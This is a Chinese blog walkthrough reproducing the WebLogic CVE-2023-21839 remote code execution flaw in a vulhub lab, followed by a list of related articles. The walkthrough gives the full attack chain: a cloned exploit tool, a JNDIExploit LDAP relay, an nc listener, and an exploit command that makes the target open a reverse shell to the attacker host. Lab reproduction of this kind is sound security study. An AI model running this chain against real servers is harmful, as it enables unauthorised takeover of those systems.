Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) vulhub复现

最新推荐文章于 2024-08-01 14:12:07 发布
最新推荐文章于 2024-08-01 14:12:07 发布
阅读量362 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/131706961
版权

Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。

漏洞复现:

靶机ubuntu:192.168.126.128

攻击机kali:192.168.126.130

cd vulhub-master/

cd weblogic/

cd CVE-2023-21839/

docker-compose build #重新编译靶场环境 docker-compose up -d #开启靶场 docker-compose down #关闭靶场

启动成功后访问http://your-ip:7001/console可以看到管理界面

在这里插入图片描述

账号密码可通过docker-compose logs | grep password查看
在这里插入图片描述

攻击环境搭建

打开攻击机kali:192.168.126.130

下载poc:git clone https://github.com/4ra1n/CVE-2023-21839

在这里插入图片描述

没有安装go,先安装go:sudo apt install gccgo-go

安装后进行编译go build -o CVE-2023-21839

编译后:

在这里插入图片描述

中转工具

JNDIExploit下载:

https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

1.开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.126.130

在这里插入图片描述

2.开启nc监听: nc -lvvp 1234
在这里插入图片描述

3.攻击payload:

./CVE-2023-21839 -ip 192.168.126.128 -port 7001 -ldap ldap://192.168.126.130:1389/Basic/ReverseShell/192.168.126.130/1234

发起攻击
在这里插入图片描述

nc成功获得shell

在这里插入图片描述

成功创建hacker文件

芝士土包鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 4153
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1715
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 6601
Weblogic CVE-2023-21839漏洞复现
WebLogicCVE-2023-21839[JNDI注入]
最新发布
h1008685的博客
08-01 468
WebLogicCVE-2023-21839[JNDI注入] 漏洞原理,环境部署,漏洞利用:生成指定payload,kali启动ldap服务器,windows向靶机发送poc,建立连接
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1672
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4110
CVE-2023-21839漏洞复现
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 608
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
CVE-2023-21839vulhub weblogic 漏洞复现
weixin_46044002的博客
07-06 350
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 3996
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
Weblogic】反序列化远程代码执行漏洞(CVE-2019-2725)
时乙的博客
12-08 399
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。可以看做是CVE-2017-10271的又一入口。
weblogic CVE-2023-21839 复现
m0_65096687的博客
05-25 744
1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机。这里是用的docker下载的vulhubCVE-2023-21839。这里需要go语言进行编译 go版本大于1.19。靶机和攻击机都是192.168.85.131。让你访问ip:7001/console。2.nc开监听反弹shell。nc上反弹了一个shell。docker 启动环境。
复现CVE-2023-21839
Coder的博客
05-02 1866
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 2359
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 834
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 967
RCE漏洞,该漏洞允许经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 932
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic远程代码执行漏洞 CVE-2023-21839
昀光Icrus的博客
04-10 1095
记录个人在本地环境下复现Weblogic远程命令执行漏洞CVE-2023-21839的过程,每一步都将使用的工具下载地址附在了链接中,用于记录学习
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 579
努力提升自己呀
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值